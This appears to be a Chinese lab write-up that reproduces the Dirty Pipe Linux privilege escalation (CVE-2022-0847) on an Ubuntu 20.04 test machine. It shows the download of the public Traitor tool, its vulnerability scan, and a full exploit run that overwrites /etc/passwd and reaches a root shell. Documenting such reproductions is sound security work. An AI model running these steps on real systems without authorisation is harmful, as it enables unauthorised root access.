Dirty Pipe 概述

  • CVE-2022-0847-DirtyPipe-Exploit 存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow),但它更容易被利用,漏洞作者将此漏洞命名为 Dirty Pipe
  • 漏洞影响范围:5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102

Dirty Pipe 复现

  • 这里使用 Ubuntu 20.04 作为测试环境,使用 Traitor 进行复现。
  • 查看当前用户权限与内核:
1
2
3
4
yongz@ubuntu:/tmp$ id
uid=1003(yongz) gid=1003(yongz) groups=1003(yongz)
yongz@ubuntu:/tmp$ uname -a
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
  • 下载 Traitor 到靶机上:
1
wget https://github.com/liamg/traitor/releases/download/v0.0.14/traitor-amd64
  • 运行一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
yongz@ubuntu:/tmp$ ./traitor-amd64 


▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█
░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14
https://github.com/liamg/traitor

[+] Assessing machine state...
[+] Checking for opportunities...
[+][polkit:CVE-2021-3560] Polkit version is vulnerable!
[+][polkit:CVE-2021-3560] System is vulnerable! Run again with '--exploit polkit:CVE-2021-3560' to exploit it.
[+][kernel:CVE-2022-0847] Kernel version 5.8.0 is vulnerable!
[+][kernel:CVE-2022-0847] System is vulnerable! Run again with '--exploit kernel:CVE-2022-0847' to exploit it.
  • 直接进行利用:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
yongz@ubuntu:/tmp$ ./traitor-amd64 --exploit kernel:CVE-2022-0847


▀█▀ █▀█ ▄▀█ █ ▀█▀ █▀█ █▀█
░█░ █▀▄ █▀█ █ ░█░ █▄█ █▀▄ v0.0.14
https://github.com/liamg/traitor

[+] Assessing machine state...
[+] Checking for opportunities...
[+][kernel:CVE-2022-0847] Kernel version 5.8.0 is vulnerable!
[+][kernel:CVE-2022-0847] Opportunity found, trying to exploit it...
[+][kernel:CVE-2022-0847] Attempting to set root password...
[+][kernel:CVE-2022-0847] Opening '/etc/passwd' for read...
[+][kernel:CVE-2022-0847] Creating pipe...
[+][kernel:CVE-2022-0847] Determining pipe size...
[+][kernel:CVE-2022-0847] Pipe size is 65536.
[+][kernel:CVE-2022-0847] Filling pipe...
[+][kernel:CVE-2022-0847] Draining pipe...
[+][kernel:CVE-2022-0847] Pipe drained.
[+][kernel:CVE-2022-0847] Splicing data...
[+][kernel:CVE-2022-0847] Writing to dirty pipe...
[+][kernel:CVE-2022-0847] Write of '/etc/passwd' successful!
[+][kernel:CVE-2022-0847] Starting shell...
[+][kernel:CVE-2022-0847] Please exit the shell once you are finished to ensure the contents of /etc/passwd is restored.
[+][kernel:CVE-2022-0847] Setting up tty...
[+][kernel:CVE-2022-0847] Attempting authentication as root...
[+][kernel:CVE-2022-0847] Authenticated as root!

# id
uid=0(root) gid=0(root) groups=0(root)
  • 提权成功!